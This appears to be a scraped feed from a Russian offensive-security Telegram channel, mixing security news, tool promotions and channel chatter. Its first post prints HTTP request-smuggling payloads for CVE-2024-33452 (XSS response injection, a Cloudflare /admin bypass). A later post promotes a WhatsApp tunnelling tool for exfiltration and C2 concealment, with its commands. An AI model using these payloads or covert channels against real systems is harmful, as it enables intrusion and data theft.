Forwarded from SHADOW:Group
Раскрыли подробности
CVE-2024-33452. При обработке HTTP/1.1-запросов lua-nginx-module некорректно разбирает HEAD-запросы с телом, воспринимая тело запроса как новый отдельный запрос.Пример
Обычно прокси-серверы интерпретируют следующий HTTP-запрос как единый, поскольку GET
/smuggle находится в теле HEAD-запроса:HEAD / HTTP/1.1
Host: localhost
Content-Length: 52
GET /smuggle HTTP/1.1
Host: localhost
Однако lua-nginx-module интерпретирует его как два отдельных запроса, что приводит к рассинхронизации прокси-серверов в цепочке.
Сценарии атак
Прокси-серверы, использующие lua-nginx-module, уязвимы к этой атаке (например, Kong Gateway, Apache APISIX и другие).
Пример с Kong Gateway
Если Kong работает самостоятельно, уязвимость не представляет особой опасности. Но если Kong используется в связке с фронт-прокси (например, Nginx, Cloudflare и т. д.), злоумышленник может:
1. Внедрять вредоносные ответы (например, XSS-атаки).
2. Обходить защиту фронт-прокси (например, обход Cloudflare).
3. Перехватывать ответы других пользователей.
Этот сценарий позволяет заставить всех пользователей загрузить вредоносный ответ с XSS-кодом, даже если сайт использует обычную страницу Apache.
HEAD / HTTP/1.1
Host: localhost
Content-Length: 122
HEAD /app HTTP/1.1
Host: localhost
Connection: keep-alive
GET /app/assets?<script>alert(origin)</script> HTTP/1.1
X:
Результат: Все пользователи, отправляющие обычные запросы, получат XSS-скрипт в ответе.
Допустим, Cloudflare блокирует доступ к
/admin. Злоумышленник может скрыть GET-запрос к /admin внутри HEAD-запроса и обойти защиту.Пример:
HEAD / HTTP/1.1
Host: victim.com
Content-Length: 40
GET /admin HTTP/1.1
Host: victim.com
Результат: Cloudflare не увидит GET-запрос, и злоумышленник сможет обойти защиту.
Этот метод позволяет рассинхронизировать очередь ответов на сервере и захватить ответы других пользователей.
Пример атаки
1. Атакующий отправляет HEAD-запрос с внедрённым GET-запросом.
2. Сервер ошибочно интерпретирует тело как отдельный запрос.
3. Ответ попадает не атакующему, а следующему пользователю, а атакующий может забрать ответ жертвы.
Подробности
Более подробное описание читайте в блоге по ссылке.
#web #hrs #xss
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥10👍5
Выкатил бложик в виде сайта. Пока статей особо нет, но если какие-то баги найдёте - можете писать в чат
https://blog.poxek.cc/
Нашли баги, сайт уходит на доработку)
https://blog.poxek.cc/
🔥24😁10👍2🌚2 1
Похек
Выкатил бложик в виде сайта. Пока статей особо нет, но если какие-то баги найдёте - можете писать в чат https://blog.poxek.cc/ Нашли баги, сайт уходит на доработку)
За 2-3 часа переписал полностью с Astro на NextJS. Можете снова искать баги :)
Эх вы, дудосеры. Положили все таки 😁
Эх вы, дудосеры. Положили все таки 😁
😁17👍5🔥5
Forwarded from s0ld13r ch. (s0ld13r)
Tunneling over WhatsApp for Red Team scenarios 👋
Пока сидел попивая вкусный наурыз көже, как обычно листал ленту и наткнулся на интересный Github проект🪨
wa-tunnel - это инструмент для туннелирования TCP-трафика через WhatsApp с использованием Baileys, позволяющий обходить сетевые ограничения и использовать WhatsApp как прокси😠
Server side:
Client side:
В данном случае поднимается клиент и сервер которые коммуницируют посредством WhatsApp чата, основная привязка тут стоит не к IP-адресам напрямую, а к номерам телефонов что довольно прикольно😆
Векторы абуза для Red Team:
1️⃣ Простор для эксфильтрации данных
2️⃣ Можно попробовать использовать его как резервный Reverse Proxy
3️⃣ Дополнительный слой OPSEC для сокрытия канала C2
P.S инструмент и техника не новая, но все новое хорошо забытое старое
@s0ld13r_ch
Пока сидел попивая вкусный наурыз көже, как обычно листал ленту и наткнулся на интересный Github проект
wa-tunnel - это инструмент для туннелирования TCP-трафика через WhatsApp с использованием Baileys, позволяющий обходить сетевые ограничения и использовать WhatsApp как прокси
Server side:
npm run server <VPS> <PORT> <PHONE>Client side:
npm run client <PORT> <PHONE>В данном случае поднимается клиент и сервер которые коммуницируют посредством WhatsApp чата, основная привязка тут стоит не к IP-адресам напрямую, а к номерам телефонов что довольно прикольно
Векторы абуза для Red Team:
P.S инструмент и техника не новая, но все новое хорошо забытое старое
@s0ld13r_ch
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥14👍4🌚2
AI-powered SOC: революция в работе центров обеспечения безопасности
#SOC #AI #cybersecurity@poxek #ML #security
Современные SOC сталкиваются с лавинообразным ростом числа инцидентов и ложных срабатываний, что создает серьезную нагрузку на аналитиков. Искусственный интеллект становится не просто модным трендом, а необходимым инструментом для эффективной работы центров безопасности. По данным исследований,
AI-powered SOC способен обрабатывать инциденты в 10 раз быстрее традиционного подхода.
Ключевые направления применения AI в SOC:
➡️ Автоматическая классификация инцидентов: ML-модели определяют приоритет и тип угроз
➡️ Поведенческая аналитика: выявление аномального поведения пользователей и систем
➡️ Предиктивный анализ: прогнозирование потенциальных атак на основе исторических данных
➡️ Автоматизация рутинных задач: высвобождение времени аналитиков для сложных расследований
💵 Практический кейс
Крупный банк внедрил AI-систему в SOC и получил следующие результаты:
▪️ Снижение false-positive на 76%
▪️ Ускорение обработки инцидентов в 8.5 раз
▪️ Автоматическое закрытие 65% типовых инцидентов
❗️ Важные моменты при внедрении
➡️ Качественные данные для обучения моделей
➡️ Постоянная валидация результатов работы AI
➡️ Гибридный подход: AI + экспертиза аналитиков
➡️ Интеграция с существующими процессами ИБ
🔗 Дополнительное чтиво
Ваши ставки, сколько уйдет денег и времени на обучение такого ML/ИИ?
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#SOC #AI #cybersecurity@poxek #ML #security
Современные SOC сталкиваются с лавинообразным ростом числа инцидентов и ложных срабатываний, что создает серьезную нагрузку на аналитиков. Искусственный интеллект становится не просто модным трендом, а необходимым инструментом для эффективной работы центров безопасности. По данным исследований,
AI-powered SOC способен обрабатывать инциденты в 10 раз быстрее традиционного подхода.
Ключевые направления применения AI в SOC:
Крупный банк внедрил AI-систему в SOC и получил следующие результаты:
Ваши ставки, сколько уйдет денег и времени на обучение такого ML/ИИ?
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥8👍2🔥1🌚1 1
Sachok
1. Похек
Похек топ 1 offensive канал в рейтинге ИБ каналов
#топ #ибканалы #подборки
Думаю некоторые уже увидели, что коллеги админы составили Рейтинг ИБ Каналов. Похек занял топ 1 в категории Offensive и мне очень приятно, что коллеги меня столь высоко оценили)
Пару слов о том, как составлялся рейтинг, был создан чатик на несколько десятков админов каналов и мы голосовали за один канал в каждой категории. Но я увидел в паре чатиков, что многие не согласны с тем, что я на первом месте и что у меня нет авторского контента, из собственного только посещение конференций и мерч. И это правда, никто не отрицает, но и я не в категории Авторские каналы.
И это не оправдание, мне и правда тема чисто пентеста поднадоела, т.к. глобального ничего нового не появляется, а времени и главное желания на самостоятельные глубокие ресерчи у меня нет, т.к. всё время помимо пентестов в Бастионе я посвящаю разработке платформы обученияАкадемия Похека . Каждый выбирает свой путь развития и то, что я не сугубо технический спец - нормально)
С любовью, Поксек❤️
#топ #ибканалы #подборки
Думаю некоторые уже увидели, что коллеги админы составили Рейтинг ИБ Каналов. Похек занял топ 1 в категории Offensive и мне очень приятно, что коллеги меня столь высоко оценили)
Пару слов о том, как составлялся рейтинг, был создан чатик на несколько десятков админов каналов и мы голосовали за один канал в каждой категории. Но я увидел в паре чатиков, что многие не согласны с тем, что я на первом месте и что у меня нет авторского контента, из собственного только посещение конференций и мерч. И это правда, никто не отрицает, но и я не в категории Авторские каналы.
И это не оправдание, мне и правда тема чисто пентеста поднадоела, т.к. глобального ничего нового не появляется, а времени и главное желания на самостоятельные глубокие ресерчи у меня нет, т.к. всё время помимо пентестов в Бастионе я посвящаю разработке платформы обучения
С любовью, Поксек
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥35❤🔥14🌚11😁7👍6👾2
Forwarded from НеКасперский
Media is too big
VIEW IN TELEGRAM
Дорога ложка к обеду
Объекты критической инфраструктуры по всему миру страдают от SSRF-уязвимости в популярнейшей обёртке над ChatGPT.
Специалисты из Veriti в течение трёх месяцев фиксируют нападения на корпоративные сети организаций. По их словам, число атак превысило 10 тысяч в неделю.
Брешь позволяет вводить вредоносные URL-адреса во входные параметры, заставляя приложение делать несанкционированные запросы. В ходе атаки хакеры могут получить доступ к конфиденциальным данным и внутренним ресурсам организаций.
Код PoC-эксплойта хранится в открытом доступе, а уязвимость не требует аутентификации. Она представляет угрозу для 35% проверенных компаний из-за недочётов в конфигурации межсетевых экранов, а также неверно настроенных IPS и WAF.
Большая часть таких атак направлена на госсектор США. Помимо этого, нападения зафиксированы в Индонезии, Колумбии, Германии, Таиланде и Великобритании.
Как ни странно, о проблеме известно ещё с сентября 2023 года, но всем было всё равно.
НеКасперский
Объекты критической инфраструктуры по всему миру страдают от SSRF-уязвимости в популярнейшей обёртке над ChatGPT.
Специалисты из Veriti в течение трёх месяцев фиксируют нападения на корпоративные сети организаций. По их словам, число атак превысило 10 тысяч в неделю.
Брешь позволяет вводить вредоносные URL-адреса во входные параметры, заставляя приложение делать несанкционированные запросы. В ходе атаки хакеры могут получить доступ к конфиденциальным данным и внутренним ресурсам организаций.
Код PoC-эксплойта хранится в открытом доступе, а уязвимость не требует аутентификации. Она представляет угрозу для 35% проверенных компаний из-за недочётов в конфигурации межсетевых экранов, а также неверно настроенных IPS и WAF.
Большая часть таких атак направлена на госсектор США. Помимо этого, нападения зафиксированы в Индонезии, Колумбии, Германии, Таиланде и Великобритании.
Как ни странно, о проблеме известно ещё с сентября 2023 года, но всем было всё равно.
НеКасперский
😁11👍3❤🔥1
Как мы взломали цепочку поставок и получили 50 тысяч долларов
#docker #DevOps #bugbounty #багбаунти #github
Прикольная статья про то, как два француза соревновались друг с другом за крутое Баунти и место в лидерборде HackerOne и как в итоге пришли к сотрудничеству)
Ребята захотели сделать что-то нереальное и реализовать один из сложных векторов для RCE через Supply Chain Attack. Они узнали, что компания недавно купила другую дочернюю компанию и они предположили, что там могут быть хреновые процессы и за ними меньше следят, собственно они не прогадали)
➡️ Читать далее
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#docker #DevOps #bugbounty #багбаунти #github
Прикольная статья про то, как два француза соревновались друг с другом за крутое Баунти и место в лидерборде HackerOne и как в итоге пришли к сотрудничеству)
Ребята захотели сделать что-то нереальное и реализовать один из сложных векторов для RCE через Supply Chain Attack. Они узнали, что компания недавно купила другую дочернюю компанию и они предположили, что там могут быть хреновые процессы и за ними меньше следят, собственно они не прогадали)
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12🌚2❤🔥1
Часто слышу, что репосты - это плохо. А что думаете вы?
Final Results
22%
Затишье в канале, без репостов. Только посты от меня
78%
Заполнять пробелы в канале годными репостами (как например последние 2)
2🔥5❤🔥1
Новая вакансия Гусь-новосёл в Astra
Обязанности:
- Возглавить миграцию айтишников в новый офис.
- Вдохновлять коллег на поддержание порядка в переговорках и в мыслях.
- Тестировать массажные кресла для сотрудников.
- Проверять кофе-машины под высокой нагрузкой.
- Участвовать в разработке сбалансированных вкусных завтраков в офисе.
- Придумывать поводы для искреннего гогота с целью поддержания в норме психоэмоционального состояния коллег.
- Раскусывать баги.
- Покачивать перьями в такт музыке из колонок на кухне.
- Заботливо задавать команде вопрос «как дела?», чтобы напомнить об отпускной зимовке, которой давно не было.
- Превентивно настойчиво шипеть, когда кто-то хочет деплоить в пятницу.
Требования:
- Опыт работы на позиции гуся-новосёла от 5 лет, уровень Senior и выше.
- Развитые навыки коммуникации со стейкхолдерами, чипсохолдерами и другими холдерами съестного.
- Готовность трудиться, не покладая лап.
- Знание алгоритмов поедания яблок и зефира (не надо оптимизировать, надо наслаждаться).
- Любовь к пингвинам, слонам, туканам, медведям, дружелюбие к фауне и флоре.
- Держать клюв по ветру.
https://hh.ru/vacancy/118740353
Обязанности:
- Возглавить миграцию айтишников в новый офис.
- Вдохновлять коллег на поддержание порядка в переговорках и в мыслях.
- Тестировать массажные кресла для сотрудников.
- Проверять кофе-машины под высокой нагрузкой.
- Участвовать в разработке сбалансированных вкусных завтраков в офисе.
- Придумывать поводы для искреннего гогота с целью поддержания в норме психоэмоционального состояния коллег.
- Раскусывать баги.
- Покачивать перьями в такт музыке из колонок на кухне.
- Заботливо задавать команде вопрос «как дела?», чтобы напомнить об отпускной зимовке, которой давно не было.
- Превентивно настойчиво шипеть, когда кто-то хочет деплоить в пятницу.
Требования:
- Опыт работы на позиции гуся-новосёла от 5 лет, уровень Senior и выше.
- Развитые навыки коммуникации со стейкхолдерами, чипсохолдерами и другими холдерами съестного.
- Готовность трудиться, не покладая лап.
- Знание алгоритмов поедания яблок и зефира (не надо оптимизировать, надо наслаждаться).
- Любовь к пингвинам, слонам, туканам, медведям, дружелюбие к фауне и флоре.
- Держать клюв по ветру.
https://hh.ru/vacancy/118740353
😁32👍5❤🔥1🔥1
#grafana #recon #разведка
Команда CyberOK снова провела классный ресерч и поделился с сообществом на Хабре. Ребята взяли свой опыт, разнюхали новые баги и получилась классная статья)
В ходе их исследования они выяснили, что Grafana может быть использована для:
А в конце статьи дали готовый чек-лист по аудиту Grafana. Считаю статья более чем достойна вашего прочтения)
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥19👍10😁1🌚1
Чат временно получил новое название
Багбхантерский район, село Триажево, улица Критов
Всех приглашаю поселиться на нашей улице 😁
@poxek_chat
Багбхантерский район, село Триажево, улица Критов
Всех приглашаю поселиться на нашей улице 😁
@poxek_chat
5👍11🔥5
У коллег-админов были снесены каналы телегой. Причины естесна никто не озвучил, со слов Вадима Шелеста ответ на аппеляцию можно ждать в течении 3 месяцев, но гарантий что ответят - никаких нет(
Поетому, на случай блокировок уже моего канала, я сделал @poxek_backup, где буду параллельно постить весь контент. Прямо сейчас уже можете там найти бекапы с 22 года по 30.03.2025. И после этого поста закину туда последние наверное 200 постов, чтобы канал не был уже слишком пустым. Но понятно, что все практически 5000 постов я не в силах туда форварднуть
Также напоминаю, что сделал бложик https://blog.poxek.cc и я скоро будет релиз моей самописной платформы обучения Академия Похека‼️ , ведь даже снос канала не будет означать прекращение существование бренда Похек и его участников)
Пока лендоса нет, но всё нужное вы увидите скоро на https://poxek.cc :)
P.S. похек моих сервисов, кроме blog.poxek.cc & cmd.poxek.cc — запрещен)
Поетому, на случай блокировок уже моего канала, я сделал @poxek_backup, где буду параллельно постить весь контент. Прямо сейчас уже можете там найти бекапы с 22 года по 30.03.2025. И после этого поста закину туда последние наверное 200 постов, чтобы канал не был уже слишком пустым. Но понятно, что все практически 5000 постов я не в силах туда форварднуть
Также напоминаю, что сделал бложик https://blog.poxek.cc и я скоро будет релиз моей самописной платформы обучения Академия Похека
Пока лендоса нет, но всё нужное вы увидите скоро на https://poxek.cc :)
P.S. похек моих сервисов, кроме blog.poxek.cc & cmd.poxek.cc — запрещен)
Please open Telegram to view this post
VIEW IN TELEGRAM
35👍14🔥5
Forwarded from Offensive Xwitter
This media is not supported in your browser
VIEW IN TELEGRAM
😈 [ Duncan Ogilvie 🍍 @mrexodia ]
Success! Claude 3.7 with my IDA Pro MCP server managed to solve the crackme that was previously failing🦾
The trick was adding a convert_number tool and stress to always use it for conversions. It took ~7 minutes to run and the cost was $1.85. Also includes an analysis report.
🔗 https://github.com/mrexodia/ida-pro-mcp
🐥 [ tweet ]
Success! Claude 3.7 with my IDA Pro MCP server managed to solve the crackme that was previously failing🦾
The trick was adding a convert_number tool and stress to always use it for conversions. It took ~7 minutes to run and the cost was $1.85. Also includes an analysis report.
🔗 https://github.com/mrexodia/ida-pro-mcp
🐥 [ tweet ]
рип цтфы категории пвн🔥5❤🔥3👍1
Крупная утечка данных Keenetic: миллион устройств под угрозой
#keenetic #роутер #маршрутизатор
➡️ Хронология
Keenetic осведомлена об инциденте и сообщает, что ещё 15 марта 23 года независимый ИБ-исследователь уведомил их о возможности неавторизованного доступа к базам данных Keenetic Mobile App.
По словам компании, разработчики оперативно устранили проблему, как только подтвердили угрозу и определили источник.
Keenetic утверждает, что до февраля 2025 года не было замечено никакой подозрительной активности
➡️ Что говорят анонимные источники?
По данным исследователей, утечка содержала следующие данные:
▪️ Пароли и настройки WiFi
▪️ Подробные журналы обслуживания
▪️ Конфигурации сетевых интерфейсов
▪️ Настройки VPN клиентов
Злоумышленники, потенциально владеющие такими даными, могут:
▪️ Захватывать домашние и корпоративные сети
▪️ Перехватывать, анализировать и переадресовывать трафик
▪️ Получать доступ к устройствам, находящимся в сети
➡️ Реакция компании
Keenetic выпустила памятку для пользователей Keenetic Mobile App о необходимости сменить авторизационные данные. По их сведениям, утечка затронула пользователей, зарегистрированных до 16 марта 23 года.
Компания уточняет, что в утечку также попали:
▪️ Идентификаторы Keycloak
▪️ Электронные адреса (логины) и имена учетных записей Keenetic
▪️ Конфигурации учетных записей пользователей устройств
▪️ Хэши паролей MD5 и NT
▪️ Конфигурации сетевых интерфейсов, включая идентификаторы WiFi
По словам компании, банковские данные, транзакции и ключи VPN остались защищёнными.
➡️ Рекомендации
▪️ Сменить все пароли: как учётных записей Keenetic, так и WiFi
▪️ Обновить прошивку маршрутизатора
▪️ Проверить настройки сети
▪️ Отключить возможность удалённого доступа, если он не используется
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#keenetic #роутер #маршрутизатор
Пользователи маршрутизаторов от Keenetic, преимущественно российские, подверглись угрозе взлома из-за утечки данных, содержащих сведения об устройствах, конфиденциальные данные, конфигурации сетей и логи. Имея эту информацию, хакеры могут получить непосредственный доступ и перехватить затронутые сети. Однако, компания утверждает что риск злоумышленной деятельности минимален.
Keenetic осведомлена об инциденте и сообщает, что ещё 15 марта 23 года независимый ИБ-исследователь уведомил их о возможности неавторизованного доступа к базам данных Keenetic Mobile App.
По словам компании, разработчики оперативно устранили проблему, как только подтвердили угрозу и определили источник.
Keenetic утверждает, что до февраля 2025 года не было замечено никакой подозрительной активности
По данным исследователей, утечка содержала следующие данные:
Злоумышленники, потенциально владеющие такими даными, могут:
Keenetic выпустила памятку для пользователей Keenetic Mobile App о необходимости сменить авторизационные данные. По их сведениям, утечка затронула пользователей, зарегистрированных до 16 марта 23 года.
Компания уточняет, что в утечку также попали:
По словам компании, банковские данные, транзакции и ключи VPN остались защищёнными.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5🌚4👾1
Feberis Pro: Революционная расширительная плата для Flipper Zero
#flipper_zero
Feberis Pro — это передовая расширительная плата, разработанная для устройства Flipper Zero, которая значительно расширяет его возможности в области анализа и взаимодействия с беспроводными технологиями. Эта плата оснащена четырьмя радиомодулями: двумя модулями CC1101 для работы на частотах 433 МГц и 868 МГц, модулем NRF24 для взаимодействия с устройствами на частоте 2,4 ГГц, а также модулем ESP32 с поддержкой Wi-Fi.
➡️ Технические особенности
CC1101 Модули: Позволяют захватывать и анализировать радиосигналы в диапазоне ниже 1 ГГц, что делает возможным взаимодействие с такими устройствами, как пульты дистанционного управления, погодные станции и системы умного дома. Два модуля обеспечивают одновременную работу на разных частотах, что повышает эффективность при захвате и анализе сигналов.
NRF24 Модуль: Используется для анализа и взаимодействия с устройствами на частоте 2,4 ГГц, включая тестирование уязвимости MouseJack и джемминг Bluetooth и Wi-Fi сигналов.
ESP32 Модуль: Обеспечивает поддержку Wi-Fi, что позволяет проводить сканирование доступных точек доступа, деаутентификацию устройств и другие операции.
Встроенный GPS: Позволяет проводить wardriving с логированием, временным и географическим штампом обнаруженных сигналов, что особенно полезно для исследователей безопасности при анализе беспроводных сетей.
➡️ Преимущества для ИБэээшников
Feberis Pro предназначена для исследователей безопасности и пентестеров, предоставляя им мощный инструмент для анализа и взаимодействия с широким спектром беспроводных технологий. Плата не требует внешнего питания, питаясь от Flipper Zero, что делает ее удобной для использования в полевых условиях.
➡️ Технические характеристики
Питание: через порт GPIO Flipper Zero.
Температурный диапазон: от -10°C до 60°C. Готов к физ пентестам хоть в Африке :D
Размеры без антенн: 7,8 см х 7,6 см х 2,6 см.
Вес с антеннами: 113 граммов.
➡️ Стоит эта диковина около 103$ и продаётся ТУТ
🔗 Читать полную статью
P.S. если возникнут вопросы а где купить флиппер дёшево, то можете заказывать на Joom. Доставка умеренно быстрая, цена считайте самая дешёвая. В РФ магазинах стоит всегда х2 от цены на джуме.
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#flipper_zero
Feberis Pro — это передовая расширительная плата, разработанная для устройства Flipper Zero, которая значительно расширяет его возможности в области анализа и взаимодействия с беспроводными технологиями. Эта плата оснащена четырьмя радиомодулями: двумя модулями CC1101 для работы на частотах 433 МГц и 868 МГц, модулем NRF24 для взаимодействия с устройствами на частоте 2,4 ГГц, а также модулем ESP32 с поддержкой Wi-Fi.
CC1101 Модули: Позволяют захватывать и анализировать радиосигналы в диапазоне ниже 1 ГГц, что делает возможным взаимодействие с такими устройствами, как пульты дистанционного управления, погодные станции и системы умного дома. Два модуля обеспечивают одновременную работу на разных частотах, что повышает эффективность при захвате и анализе сигналов.
NRF24 Модуль: Используется для анализа и взаимодействия с устройствами на частоте 2,4 ГГц, включая тестирование уязвимости MouseJack и джемминг Bluetooth и Wi-Fi сигналов.
ESP32 Модуль: Обеспечивает поддержку Wi-Fi, что позволяет проводить сканирование доступных точек доступа, деаутентификацию устройств и другие операции.
Встроенный GPS: Позволяет проводить wardriving с логированием, временным и географическим штампом обнаруженных сигналов, что особенно полезно для исследователей безопасности при анализе беспроводных сетей.
Feberis Pro предназначена для исследователей безопасности и пентестеров, предоставляя им мощный инструмент для анализа и взаимодействия с широким спектром беспроводных технологий. Плата не требует внешнего питания, питаясь от Flipper Zero, что делает ее удобной для использования в полевых условиях.
Питание: через порт GPIO Flipper Zero.
Температурный диапазон: от -10°C до 60°C. Готов к физ пентестам хоть в Африке :D
Размеры без антенн: 7,8 см х 7,6 см х 2,6 см.
Вес с антеннами: 113 граммов.
P.S. если возникнут вопросы а где купить флиппер дёшево, то можете заказывать на Joom. Доставка умеренно быстрая, цена считайте самая дешёвая. В РФ магазинах стоит всегда х2 от цены на джуме.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥14👍1